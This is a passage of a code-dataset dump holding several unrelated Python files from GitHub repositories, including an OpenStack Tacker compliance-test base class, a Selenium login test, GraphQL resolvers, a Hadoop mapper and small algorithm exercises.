Номер 405/549\"\n good_numbers = makeGoodNumbers(input_string)\n for number in good_numbers:\n print(number)","repo_name":"SweetB0nes/Sber_TT","sub_path":"Python/first_task.py","file_name":"first_task.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182825371","text":"#!/usr/bin/env python\nimport pickle\nimport sys\nfrom pprint import pprint\n\npretty = True # Default\n\nif len(sys.argv) > 1:\n filename = sys.argv[1]\nelse:\n print(\"You need to supply an .pickle file - aborting\")\n sys.exit()\n\nif len(sys.argv) > 2:\n if sys.argv[2] == \"pretty\" or \"p\":\n pretty = True\n if sys.argv[2] == \"raw\" or \"r\":\n pretty = False\n\nwith open(filename, \"rb\") as f:\n data = pickle.load(f)\n\nif pretty:\n pprint(data, compact=True)\nelse:\n print(data)\n","repo_name":"Libensemble/libensemble","sub_path":"scripts/print_pickle.py","file_name":"print_pickle.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"29048729607","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport pytest\n\nimport btestlib.reporter as reporter\nfrom balance import balance_api as api\nfrom balance import balance_steps as steps\n\nSERVICE_ID = 7\n# PRODUCT_ID = 502953 ##502918\nPRODUCT_ID = 1475\nPAYSYS_ID = 1020\nQTY = 10\nBASE_DT = datetime.datetime.now()\n\n\ndef test_deny_kzt_nonres_offerta_for_direct():\n client_id = None or steps.ClientSteps.create({'IS_AGENCY': 0, 'NAME': u'Petrov3'})\n # db.balance().execute(\"Update t_client set REGION_ID = :region_id where ID = :client_id\",\n # {'client_id': client_id, 'region_id': 159})\n agency_id = None\n\n order_owner = client_id\n invoice_owner = agency_id or client_id\n\n person_id = None or steps.PersonSteps.create(invoice_owner, 'kzu', {'phone': '234'})\n contract_id = None\n\n service_order_id = steps.OrderSteps.next_id(SERVICE_ID)\n steps.OrderSteps.create(order_owner, service_order_id, service_id=SERVICE_ID, product_id=PRODUCT_ID,\n params={'AgencyID': agency_id})\n orders_list = [{'ServiceID': SERVICE_ID, 'ServiceOrderID': service_order_id, 'Qty': QTY, 'BeginDT': BASE_DT}\n ]\n\n request_id = steps.RequestSteps.create(invoice_owner, orders_list)\n invoice_id, _, _ = steps.InvoiceSteps.create(request_id, person_id, PAYSYS_ID, credit=0, contract_id=contract_id,\n overdraft=0, endbuyer_id=None)\n steps.InvoiceSteps.pay(invoice_id)\n for item in api.test_balance().GetNotification(10, client_id): reporter.log(item)\n\n\nif __name__ == \"__main__\":\n pytest.main('-v')","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/scripts/torvald/test_T22112_Multicurrency_notification_for_KZT.py","file_name":"test_T22112_Multicurrency_notification_for_KZT.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35458684876","text":"input_path = 'input.txt'\n\nscores = {')': 3, ']': 57, '}': 1197, '>': 25137}\nopening = ['(', '[', '{', '<']\nclosing = {'(': ')', '[': ']', '{': '}', '<': '>'}\n\n\ndef first_corrupted_char(line):\n stack = []\n for char in line:\n if char in opening:\n stack.append(char)\n else:\n if char == closing[stack[-1]]:\n stack.pop()\n else:\n return char\n \n\nif __name__ == '__main__':\n with open(input_path) as input_data:\n lines = input_data.read().split('\\n')\n\n score = 0\n for line in lines:\n illegal_char = 
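# In print_pickle.py above, `sys.argv[2] == "pretty" or "p"` only compares
# against "pretty" and then or's in the always-truthy string "p", so both
# branches fire and pretty ends up False whenever a second argument is given
# at all. A membership test expresses the intent:
import sys

pretty = True
if len(sys.argv) > 2:
    pretty = sys.argv[2] in ("pretty", "p")  # "raw"/"r" or anything else -> False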
first_corrupted_char(line)\n if illegal_char is not None:\n score += scores[illegal_char]\n\n print(score)\n","repo_name":"nmmarzano/advent-of-code-2021","sub_path":"Day 10/part_one.py","file_name":"part_one.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72360132883","text":"import json\nimport os\nimport time\nimport xml.etree.ElementTree as et\n\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import uuidutils\nimport robot\nfrom urllib.parse import urlparse\n\nfrom tacker.tests.functional import base\nfrom tacker.tests.functional.sol.vnflcm import test_vnf_instance as vnflcmtest\n\nVNFPKG_PATH = '/vnfpkgm/v1/vnf_packages/%s'\nVNFINSS_PATH = '/vnflcm/v1/vnf_instances'\nVNFINS_PATH = '/vnflcm/v1/vnf_instances/%s'\nVNFINS_INST_PATH = '/vnflcm/v1/vnf_instances/%s/instantiate'\nVNFINS_TERM_PATH = '/vnflcm/v1/vnf_instances/%s/terminate'\nVNFINS_GET_LCM_OP_OCCS_PATH = '/vnflcm/v1/vnf_lcm_op_occs'\nVNFINS_GET_IND_LCM_OP_OCCS_PATH = '/vnflcm/v1/vnf_lcm_op_occs/%s'\nVNFINS_CREATE_SUBSC_PATH = '/vnflcm/v1/subscriptions'\nVNFINS_DEL_SUBSC_PATH = '/vnflcm/v1/subscriptions/%s'\nVNFINS_SCALE_PATH = '/vnflcm/v1/vnf_instances/%s/scale'\n\nINSTANTIATION_BODY = {\n 'flavourId': 'simple',\n 'extVirtualLinks': [\n {\n 'id': 'net0',\n 'resourceId': None,\n 'extCps': [\n {\n 'cpdId': 'CP1',\n 'cpConfig': [\n {\n 'cpProtocolData': [\n {\n 'layerProtocol': 'IP_OVER_ETHERNET'\n }\n ]\n }\n ]\n }\n ]\n }\n ],\n 'vimConnectionInfo': [\n {\n 'id': None,\n 'vimId': None,\n 'vimType': 'ETSINFV.OPENSTACK_KEYSTONE.v_2'\n }\n ]\n}\n\nTERMINATION_BODY = {\n 'terminationType': 'GRACEFUL',\n 'gracefulTerminationTimeout': 120\n}\n\nPATCH_BODY = {\n 'vnfInstanceName': 'vnf new name',\n 'vnfInstanceDescription': 'new description'\n}\n\nSUBSCRIPTION_BODY = {\n 'filter': {\n 'vnfInstanceSubscriptionFilter': {\n 'vnfdIds': [\n ''\n ]\n }\n },\n 'callbackUri': 'http://localhost:9091/endpoint'\n}\n\nSCALE_BODY = {\n 'type': 'SCALE_OUT',\n 'aspectId': 'VDU1',\n 'numberOfSteps': 1,\n 'additionalParams': {\n 'samplekey': 'samplevalue'\n }\n}\n\nHEAL_BODY = {\n 'vnfcInstanceId': None,\n 'cause': 'healing'\n}\n\nCHG_EXT_CONN_BODY = {\n \"extVirtualLinks\": [{\n \"id\": \"8877c521-7c51-4da8-a5b9-308b40437fd2\",\n \"resourceId\": \"dfc1872e-69a7-4f14-a2c7-5bac8bd545eb\",\n \"extCps\": [{\n \"cpdId\": \"CP1\",\n \"cpConfig\": [{\n }]\n }]\n }],\n \"vimConnectionInfo\": [{\n \"id\": \"748f7d54-9fdf-4e7a-a180-ec057a9eefd8\",\n \"vimId\": \"310e0d4c-7e85-42e4-b289-d09c0bdc44c8\",\n \"vimType\": \"openstack\",\n \"interfaceInfo\": {\n \"endpoint\": \"http://127.0.0.1/identity\"\n }\n }]\n}\n\n\nclass VnfPkgInfo:\n def __init__(self, vnfpkgid, vnfdid):\n self._vnfpkgid = vnfpkgid\n self._vnfdid = vnfdid\n\n @property\n def vnfpkgid(self):\n return self._vnfpkgid\n\n @property\n def vnfdid(self):\n return self._vnfdid\n\n\nclass BaseComplTest(base.BaseTackerTest):\n @classmethod\n def setUpClass(cls):\n super(BaseComplTest, cls).setUpClass()\n\n for vim_list in cls.client.list_vims().values():\n for vim in vim_list:\n if vim['name'] == 'VIM0':\n cls.vimid = vim['id']\n\n for net_list in cls.neutronclient().list_networks().values():\n for net in net_list:\n if net['name'] == 'net0':\n cls.net0_id = net['id']\n\n cls.base_dir = os.getcwd()\n cls.test_root_dir = os.path.join(cls.base_dir, 'api-tests')\n cls.sol_dir = os.path.join(cls.test_root_dir, cls.sol)\n cls.api_dir = os.path.join(cls.sol_dir, cls.api)\n cls.test_file = 
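# first_corrupted_char() above pops stack[-1] without checking for an empty
# stack, so a line that starts with a closing bracket raises IndexError. A
# guarded variant of the same scan:
def first_corrupted_char(line):
    closing = {"(": ")", "[": "]", "{": "}", "<": ">"}
    stack = []
    for char in line:
        if char in closing:  # keys are the opening brackets
            stack.append(char)
        elif not stack or char != closing[stack[-1]]:
            return char  # corrupted (or unmatched) closing character
        else:
            stack.pop()
    return None  # line is valid or merely incomplete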
cls.resource + '.robot'\n os.chdir(cls.api_dir)\n\n parts = urlparse(cls.http_client.get_endpoint())\n\n cls.common_variables = []\n cls.common_variables.append('VNFM_SCHEMA:%s' % parts.scheme)\n cls.common_variables.append('NFVO_SCHEMA:%s' % parts.scheme)\n cls.common_variables.append('VNFM_HOST:%s' % parts.hostname)\n cls.common_variables.append('NFVO_HOST:%s' % parts.hostname)\n cls.common_variables.append('VNFM_PORT:%s' % parts.port)\n cls.common_variables.append('NFVO_PORT:%s' % parts.port)\n cls.common_variables.append('AUTH_USAGE:1')\n cls.common_variables.append('AUTHORIZATION_HEADER:X-Auth-Token')\n cls.common_variables.append('AUTHORIZATION_TOKEN:%s' %\n cls.http_client.get_token())\n\n @classmethod\n def tearDownClass(cls):\n os.chdir(cls.base_dir)\n\n super(BaseComplTest, cls).tearDownClass()\n\n @classmethod\n def _get_responses_from_output(cls, output):\n result = []\n for el in et.fromstring(output).findall(\n \".//kw[@name='Output']/[@library='REST']/msg[1]\"):\n result.append(json.loads(el.text))\n return result\n\n @classmethod\n def _get_id_from_output(cls, output):\n res = cls._get_responses_from_output(output)\n if ('status' in res[0] and\n res[0]['status'] in [200, 201, 202, 203, 204]):\n if ('body' in res[0] and 'id' in res[0]['body']):\n return res[0]['body']['id']\n\n return None\n\n @classmethod\n def _create_and_upload_vnf_packages(cls, pkgnames):\n vnfpkginfos = []\n for pkgname in pkgnames:\n vnfpkgid, vnfdid = vnflcmtest._create_and_upload_vnf_package(\n cls.http_client, pkgname, {})\n vnfpkginfos.append(VnfPkgInfo(vnfpkgid, vnfdid))\n\n return vnfpkginfos\n\n @classmethod\n def _disable_vnf_package(cls, vnfpkgid):\n cls.http_client.do_request(VNFPKG_PATH % vnfpkgid,\n 'PATCH', content_type='application/json',\n body=jsonutils.dumps({\"operationalState\": \"DISABLED\"}))\n\n @classmethod\n def _get_vnfpkgids(cls, vnfpkginfos):\n vnfpkgids = []\n for vnfpkginfo in vnfpkginfos:\n vnfpkgids.append(vnfpkginfo.vnfpkgid)\n\n return vnfpkgids\n\n @classmethod\n def _delete_vnf_package(cls, vnfpkgid):\n cls.http_client.do_request(VNFPKG_PATH % vnfpkgid, 'DELETE')\n\n @classmethod\n def _disable_and_delete_vnf_packages(cls, vnfpkginfos):\n for vnfpkginfo in vnfpkginfos:\n cls._disable_vnf_package(vnfpkginfo.vnfpkgid)\n cls._delete_vnf_package(vnfpkginfo.vnfpkgid)\n\n @classmethod\n def _create_vnf_instance(cls, vnfdid, name=None, description=None):\n body = {'vnfdId': vnfdid}\n if name:\n body['vnfInstanceName'] = name\n if description:\n body['vnfInstanceDescription'] = description\n\n res, resbody = cls.http_client.do_request(VNFINSS_PATH, 'POST',\n body=jsonutils.dumps(body))\n\n return res, resbody\n\n @classmethod\n def _delete_vnf_instance(cls, vnfid):\n resp, body = cls.http_client.do_request(VNFINS_PATH % vnfid, 'DELETE')\n\n @classmethod\n def _instantiate_vnf_instance(cls, vnfid):\n body = INSTANTIATION_BODY\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _terminate_vnf_instance(cls, vnfid):\n cls.http_client.do_request(VNFINS_TERM_PATH % vnfid,\n 'POST', body=jsonutils.dumps(TERMINATION_BODY))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'NOT_INSTANTIATED')\n\n @classmethod\n def _get_vnf_ind_instance(cls, vnfid):\n res, resbody = 
cls.http_client.do_request(VNFINS_PATH % vnfid, 'GET')\n\n return resbody\n\n @classmethod\n def _get_vnf_instance_id(cls):\n res, resbody = cls.http_client.do_request(VNFINSS_PATH, 'GET')\n\n return resbody[0]['id']\n\n @classmethod\n def _instantiate_vnf_instance_for_scale(cls, vnfid):\n body = INSTANTIATION_BODY\n body['flavourId'] = 'default'\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n body['additionalParams'] = {\n \"lcm-operation-user-data\": \"./UserData/lcm_user_data.py\",\n \"lcm-operation-user-data-class\": \"SampleUserData\"\n }\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _instantiate_error_vnf_instance(cls, vnfid):\n body = INSTANTIATION_BODY\n body['flavorId'] = 'sample'\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n body['additionalParams'] = {\n \"lcm-operation-user-data\": \"./UserData/lcm_user_data2.py\",\n \"lcm-operation-user-data-class\": \"SampleUserData\"\n }\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _get_lcm_op_occs_id(cls, vnfid, lcm='INSTANTIATE'):\n res, resbody = cls.http_client.do_request(\n VNFINS_GET_LCM_OP_OCCS_PATH, 'GET')\n\n lcmid = None\n for entry in resbody:\n lcm_dict = entry\n if ((lcm_dict['vnfInstanceId'] == vnfid) and\n (lcm_dict['operation'] == lcm)):\n lcmid = lcm_dict['id']\n break\n\n return lcmid\n\n @classmethod\n def _create_subscription(cls, vnfdid):\n body = SUBSCRIPTION_BODY\n body['filter']['vnfInstanceSubscriptionFilter']['vnfdIds'] = [vnfdid]\n res, resbody = cls.http_client.do_request(VNFINS_CREATE_SUBSC_PATH,\n 'POST', body=jsonutils.dumps(body))\n\n subscid = cls._get_id_from_output(resbody)\n return subscid\n\n @classmethod\n def _get_subscription_id(cls):\n res, resbody = cls.http_client.do_request(VNFINS_CREATE_SUBSC_PATH,\n 'GET')\n\n subscid = resbody[0]['id']\n return subscid\n\n @classmethod\n def _delete_subscription(cls, subscId):\n cls.http_client.do_request(VNFINS_DEL_SUBSC_PATH % subscId,\n 'DELETE')\n\n @classmethod\n def _scaleout_vnf(cls, vnfid):\n body = SCALE_BODY\n body['type'] = 'SCALE_OUT'\n res_scale, resbody = cls.http_client.do_request(\n VNFINS_SCALE_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n print(\"scaleout called\")\n print(res_scale)\n print(resbody)\n lcmid = cls._get_lcm_op_occs_id(vnfid, lcm='SCALE')\n res = cls._wait_lcm_status(lcmid)\n return res, lcmid\n\n @classmethod\n def _wait_lcm_status(cls, lcmid, value='COMPLETED', expire=600):\n start_time = int(time.time())\n res = 1\n\n final_state = ''\n while True:\n resp, body = cls.http_client.do_request(\n VNFINS_GET_IND_LCM_OP_OCCS_PATH % lcmid, 'GET')\n\n if body is None:\n break\n\n if ((body['operationState'] == value) or\n (((int(time.time()) - start_time) > expire)) or\n (body['operationState'] == 'FAILED_TEMP')):\n final_state = body['operationState']\n break\n\n time.sleep(5)\n time.sleep(30)\n\n if final_state == value:\n res = 0\n\n return res\n\n @classmethod\n def _wait_vnf_status(cls, vnfid, attr, value, expire=600):\n start_time = int(time.time())\n while True:\n resp, body = 
cls.http_client.do_request(VNFINS_PATH % vnfid, 'GET')\n if body[attr] == value:\n break\n\n if ((int(time.time()) - start_time) > expire):\n break\n\n time.sleep(5)\n time.sleep(30)\n\n def _run(self, test_case, variables=[], body=None, filename=None):\n if (body is not None and filename is not None):\n with open(os.path.join('jsons', filename), 'w') as f:\n f.write(body)\n all_vars = []\n all_vars.extend(variables)\n all_vars.extend(self.common_variables)\n\n odir = os.path.join(self.base_dir, 'log',\n self.sol, self.api, self.resource,\n test_case.replace(' ', '_').replace('\"', ''))\n\n if not os.path.exists(odir):\n os.makedirs(odir)\n\n with open(os.path.join(odir, 'stdout.txt'), 'w') as stdout:\n rc = robot.run(self.test_file, variable=all_vars, test=test_case,\n outputdir=odir, stdout=stdout)\n\n with open(os.path.join(odir, 'output.xml'), 'r') as ofile:\n outputxml = ofile.read()\n\n return rc, outputxml\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/compliance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13224,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"20819040536","text":"# Importar la libreria de webdriver\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.common.by import By\nimport unittest\nfrom POM.Pages.LoginPage import LoginPage\nfrom POM.Pages.HomePage import HomePage\n\nclass LoginTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.options = ChromeOptions()\n # cls.options.add_argument(\"--headless\")\n cls.driver = webdriver.Chrome(options=cls.options)\n\n def test_login_valid(self):\n driver = self.driver\n\n # Acceder al sitio\n driver.maximize_window()\n driver.get(\"https://opensource-demo.orangehrmlive.com\")\n time.sleep(6)\n # print(self.driver.title)\n\n login = LoginPage(driver)\n login.username_valid(\"Admin\")\n login.password_valid(\"admin123\")\n login.button_login()\n\n # self.driver.find_element(By.NAME, \"username\").send_keys(\"Admin\")\n # self.driver.find_element(By.NAME, \"password\").send_keys(\"admin123\")\n # self.driver.find_element(By.XPATH, \"//button[@type='submit']\").click()\n # self.driver.find_element(By.XPATH, \"//h6\")\n # time.sleep(5)\n\n homepage = HomePage(driver)\n homepage.HomeDashboard()\n homepage.HomeLogout()\n\n # self.driver.find_element(By.CLASS_NAME, \"oxd-userdropdown-tab\").click()\n # time.sleep(2)\n # self.driver.find_element(By.LINK_TEXT, \"Logout\").click()\n # time.sleep(2)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"Test Completed...\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smavo/selenium_python_test","sub_path":"POM/Test/03_LoginTest_POM.py","file_name":"03_LoginTest_POM.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41107754812","text":"import pygame as pg\n\nimport csv\n\n\nclass InteractableObject:\n \"\"\"Class for mouse interactable elements on the screen.\"\"\"\n\n def __init__(self, surface, x, y, rect_radius, color=(0, 0, 0)):\n # Center a rect object about the given x, y\n self.surface, self.rect_radius = surface, rect_radius\n self.x, self.y = x, y\n self.xy = (self.x, self.y)\n x, y = x - rect_radius, y - rect_radius\n self.rect = pg.Rect((x, y), (2 * rect_radius, 2 * rect_radius))\n self.rect_radius = 
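# _wait_lcm_status() and _wait_vnf_status() above are both "poll until a
# field reaches a value or a deadline passes". The generic form of that loop;
# fetch() stands in for the http_client.do_request calls:
import time

def wait_for(fetch, predicate, expire=600, interval=5):
    deadline = time.time() + expire
    while time.time() < deadline:
        state = fetch()
        if state is not None and predicate(state):
            return True
        time.sleep(interval)
    return False

# wait_for(lambda: get_vnf(vnfid),
#          lambda body: body["instantiationState"] == "INSTANTIATED")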
rect_radius\n self.color = color\n\n def __setattr__(self, attr, value):\n \"\"\"Helper function to set attributes for a dictionary of variable length.\"\"\"\n super().__setattr__(attr, value)\n\n def draw(self):\n \"\"\"Draw circle on given surface.\"\"\"\n pg.draw.circle(self.surface, self.color, self.xy, self.rect_radius)\n\n def update_xy(self, x, y):\n self.x, self.y = x, y\n self.xy = (self.x, self.y)\n self.rect.center = self.xy\n\n\nclass Point(InteractableObject):\n \"\"\"Class for point objects on a graph.\"\"\"\n\n def __init__(\n self,\n surface,\n point_dictionary,\n x_data_type,\n y_data_type,\n color_data_type=None,\n size_data_type=None,\n ):\n self.dict = point_dictionary\n self.set_parameters(x_data_type, y_data_type, color_data_type)\n super().__init__(surface, self.x, self.y, self.size)\n\n def __repr__(self):\n string_list = []\n for key in self.dict:\n string_list.append(f'{key}: {self.dict.get(key)}')\n return string_list\n\n def set_parameters(self,\n x_data_type,\n y_data_type,\n color_data_type=None,\n size_data_type=None,\n ):\n \"\"\"Set data types for x, y & color, size if applicable.\"\"\"\n self.x_data_type, self.y_data_type = x_data_type, y_data_type\n self.color_data_type, self.size_data_type = color_data_type, size_data_type\n self.x, self.y = float(self.dict[self.x_data_type]), float(self.dict[self.y_data_type])\n self.x0, self.y0 = self.x, self.y\n self.xy = (self.x, self.y)\n self.c = float(self.dict[self.color_data_type])\n # set default values\n self.color = (0, 0, 0)\n self.size = 5\n # set custom values if chosen\n if self.size_data_type:\n self.size = int(float(self.dict[self.size_data_type]))\n\n def update_color(self, color):\n if type(color) == tuple:\n self.color = color\n else:\n print('Color must be (r, g, b)')\n self.color = (0, 0, 0)\n","repo_name":"Saccharine-Coal/Pygame-Interactive-Graph","sub_path":"points.py","file_name":"points.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34932023146","text":"from typing import Any\n\nfrom ariadne import ObjectType\nfrom data import (Author, Blog, BlogPayload, all_blogs, get_author, get_blog,\n update_blog)\nfrom graphql import GraphQLResolveInfo\n\nfrom schema.types import mutation, query\n\n#create connection here -> blogs with author\nBLOG_TYPEDEF = \"\"\"\n type Blog {\n id: ID!\n title: String!\n content: String!\n author: Author!\n }\n\n input BlogPayload {\n title: String\n content: String\n }\n\n type Mutation {\n update_blog(id: ID!, payload: BlogPayload!): Blog!\n }\n\"\"\"\n#attach resolver to blog object\nblog_query = ObjectType(\"Blog\")\n\n#define queries in MAIN_TYPEDEF\n@query.field(\"blogs\")\ndef resolve_blogs(_, info: GraphQLResolveInfo) -> list[Blog]:\n return all_blogs()\n\n\n@query.field(\"blog\")\ndef resolve_blog(_, info: GraphQLResolveInfo, id: str) -> Blog:\n return get_blog(int(id))\n\n\n@mutation.field(\"update_blog\")\ndef resolve_update_blog(\n _, info: GraphQLResolveInfo, id: str, payload: BlogPayload\n) -> Blog:\n return update_blog(int(id), payload)\n\n#attach blog query to author using resolve\n@blog_query.field(\"author\")\ndef resolve_blog_author(blog: dict[str, Any], info: GraphQLResolveInfo) -> Author:\n print(blog)\n return 
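# Point.__repr__ in points.py above builds and returns a list, but __repr__
# must return a str, so repr(point) raises TypeError. A one-line join gives
# the string that was presumably intended:
def __repr__(self):
    return ", ".join(f"{key}: {value}" for key, value in self.dict.items())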
get_author(blog[\"author_id\"])\n","repo_name":"shlbatra/PythonTips","sub_path":"27-GraphQLvsRest/2022-rest-graphql-main/graphql/schema/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18403409614","text":"import threading\n\nthread_local_std = threading.local()\n\n\ndef HomeWork(std):\n thread_local_std.std = std\n MathWork()\n ChineseWork()\n\n\ndef HouseWork(std):\n thread_local_std.std = std\n Sweep()\n Clean()\n\n\ndef MathWork():\n std = thread_local_std.std\n print('%s do mathWork in %s' % (std, threading.current_thread().name))\n\n\ndef ChineseWork():\n std = thread_local_std.std\n print('%s do ChineseWork in %s' % (std, threading.current_thread().name))\n\n\ndef Sweep():\n std = thread_local_std.std\n print('%s do Sweep in %s' % (std, threading.current_thread().name))\n\n\ndef Clean():\n std = thread_local_std.std\n print('%s do Clean in %s' % (std, threading.current_thread().name))\n\n\ndef main():\n print('Main Thread: %s start' % threading.current_thread().name)\n HomeWork_Thread = threading.Thread(\n target=HomeWork, args=('Mike', ), name='MikeHomeWork')\n HouseWork_Thread = threading.Thread(\n target=HouseWork, args=('Sam', ), name='SamHouseWork')\n HomeWork_Thread.start()\n HouseWork_Thread.start()\n HomeWork_Thread.join()\n HouseWork_Thread.join()\n print('Main Thread: %s end' % threading.current_thread().name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lwh2016/0_PYTHON","sub_path":"1-BasicKnowledge/9-多线程/ThreadLocal.py","file_name":"ThreadLocal.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35143454461","text":"import re\nimport sys\nfrom operator import itemgetter\n\nnested_dict = {}\n\nfor line in sys.stdin:\n line = line.strip()\n ip, count = line.split('\\t')\n # print(ip, count)\n index = ip.find(']')\n hour, ipaddress = ip[1:index], ip[index + 1:]\n # print(\"hour\",hour)\n # print(\"ipaddess\",ipaddress)\n\n if hour not in nested_dict.keys():\n nested_dict[hour] = {}\n nested_dict[hour][ipaddress] = int(count)\n else:\n if ipaddress not in nested_dict[hour].keys():\n nested_dict[hour][ipaddress] = int(count)\n # print(nested_dict)\n\n# nested_dict = sorted(nested_dict.items(), key= lambda x : x[1], reverse=True)\n# inal_dict = {}\nfor hour, inner_dict in nested_dict.items():\n # print(hour)\n inner_dict = sorted(inner_dict.items(), key=itemgetter(1), reverse=True)\n # final_dict[hour] = {}\n top3 = 0\n for ip, count in inner_dict:\n if top3 >= 3:\n break\n print(hour + \"\\t\" + ip + \"\\t\" + str(count))\n # final_dict[hour][ip] = count\n top3 += 1","repo_name":"aditigode/Hadoop-searchIPaddresses","sub_path":"part1/mapper_chain2.py","file_name":"mapper_chain2.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35445926290","text":"import numpy as np\n\n# object is the base class\nclass Regressor(object):\n \"\"\"\n Base class for regressors\n \"\"\"\n\n def fit(self, X, t, **kwargs):\n \"\"\"\n estimates parameters given training dateset\n\n Parameters\n ----------\n X: (sample_size, n_fatures) np.ndarray\n training data input\n \n t: (sample_size, ) np.ndarray\n training data target\n \"\"\"\n self.__check_input(X)\n self.__check_target(t)\n if hasattr(self, \"__fit\"):\n self.__fit(X, t, **kwargs)\n else:\n 
raise NotImplementedError\n\n def __check_input(self, X):\n if not isinstance(X, np.ndarray):\n raise TypeError(\"X(input) is not a np.ndarray\")\n if X.ndim != 2:\n raise ValueError(\"X(input) is not two dimentional array\")\n # The hasattr() method returns true if an object has the given named attribute \n # and false if it does not.\n if hasattr(self, \"n_features\") and self.n_features != np.size(X, 1):\n raise ValueError(\n \"mismatch in dimension 1 of X(input) \"\n \"(size {} is different from {})\"\n .format(np.size(X, axis = 1), self.n_features))\n \n def __check_target(self, t):\n if not isinstance(t, np.ndarray):\n raise TypeError(\"t(target) must be np.ndarray\")\n if t.ndim != 1:\n raise ValueError(\"t(target) mst be one dimensional array\")\n\n","repo_name":"yiruijiang/PRML","sub_path":"linear/regressor.py","file_name":"regressor.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36377064248","text":"#백준 7569번\nimport sys\nfrom collections import deque\n\nm, n, h = map(int, input().split())\n\nmatrix = [[list(map(int, sys.stdin.readline().split())) for _ in range(n)] for _ in range(h)]\nvisited = [[[False]*m for _ in range(n)] for _ in range(h)]\n\nqueue = deque()\n\ndx = [-1,1,0,0,0,0]\ndy = [0,0,-1,1,0,0]\ndz = [0,0,0,0,-1,1]\n\ndef bfs():\n while queue:\n x,y,z = queue.popleft()\n\n for i in range(6):\n nx = x + dx[i]\n ny = y + dy[i]\n nz = z + dz[i]\n\n if nx < 0 or ny < 0 or nz < 0 or nx >= m or ny >= n or nz >= h:\n continue\n if matrix[nz][ny][nx] == 0 and visited[nz][ny][nx] == False:\n queue.append((nx,ny,nz))\n matrix[nz][ny][nx] = matrix[z][y][x] + 1\n visited[nz][ny][nx] = True\n\nanswer = 0\nfor a in range(h):\n for b in range(n):\n for c in range(m):\n if matrix[a][b][c] == 1 and visited[a][b][c] == False:\n queue.append((c,b,a))\n visited[a][b][c] = True\nbfs()\n\n# 토마토 확인\nfor a in matrix:\n for b in a:\n for c in b:\n if c == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(b))\n\nprint(answer-1)","repo_name":"LeeYongIn0517/CodingTest","sub_path":"dfs:bfs/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72189752403","text":"# Given an array, find the average of all contiguous subarrays of size ‘K’ in it.\n\n# Array: [1, 3, 2, 6, -1, 4, 1, 8, 2], K=5\n\n# Naive solution using two for loop one from 0 to k-1 and inner for loop from sliding i, i + k\n# complexity O(N*K) N elements in array and k is size of subarray\n\n\ndef solution(arr, k):\n\n windowSum = 0.0\n windowStart = 0\n result = []\n for index, ele in enumerate(arr):\n windowSum += ele\n\n if index >= k -1:\n result.append((windowSum/k))\n windowSum -= arr[windowStart]\n windowStart +=1\n \n return result\n\n\narr = [1, 3, 2, 6, -1, 4, 1, 8, 2]\nk = 5\n\nprint(\"Solution:\", solution(arr, k 